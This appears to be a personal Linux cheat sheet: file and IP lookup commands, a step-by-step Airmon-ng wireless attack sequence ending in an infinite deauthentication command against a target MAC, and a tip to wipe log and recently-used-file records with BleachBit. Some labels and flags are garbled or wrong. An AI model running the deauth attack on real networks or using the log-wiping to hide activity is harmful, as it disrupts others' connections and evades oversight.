

##################################################
Personal
#############################################


sudo find / -name *.pdf
//finds all pdf files

du -sh file 
//Displays filesize

ls -l path-to-file
//displays path to file with ls 

ls -lh filename
//shows file info with ls

stat file_name
//shows file info with stat

$ which ls
//finds command location



/
##########################################################
Steganography
####################################


lsb_release -a
//display Ubuntu  Version

nmcli dev show eth0
//

nmcli dev list iface eth0 | grep IP4
//finds IP of Ethernet port

ipconfig
//Old IP checker command

ifconfig
//finds IP and Mask

ip a
//

ip route
//Finds ALL default getaway IP info and route

ip -o -4 addr
//Finds IPv4

curl ifconfig.me
//TERMUX ifconfig


ip -o -f inet addr show | awk '/scope global/{print $2,$4,$6}'
//Returns 3 values
//Network interface name
//IP address for said interface followed by subnet mask (/24)
//The broadcast IP address for that interface's subnet




/
#####################################
Airmon-ng
##############################
//CH   = Channel of the network
//MB   = Max supported speed in the bandwith
//ENC  = Encryption protocol(WEP,WPA2,WPA3,OPEN)
//AUTH = Authentication protocol
//ESSID = Wireless Network names
//STATION = MAC address of the connected client





1.iwconfig
//interface with internet

2.airmon-ng start wlan0
//monitor mod + interface
//changes name of wlan to wlanmon

3.airmon-ng check kill
//clearn running processes on the bandwith

4.airodump-ng wlan0mon
//funelling for further probing

5.BSSID / MAC addres / PWR / CH


6.Ctrl + C


7.airodump-ng -channel <CH> wlan0mon
//-ch = target CH binding to wlan


8.Ctrl + C

!ATK!example(deauth) >> 
9.aireplay-ng -deauth 0 -a <MAC> wlan0moon
//0  = infinite packet order for the deauth option
//-a = target mac binding to wlan
//



##########################  
#   RECENTLY USED FILES  #
##########################

USE < BleachBit > Software for cleansing "log files" like .xml




~/.local/share/recently-used.xbel/
//gedit,nautilus,etc..


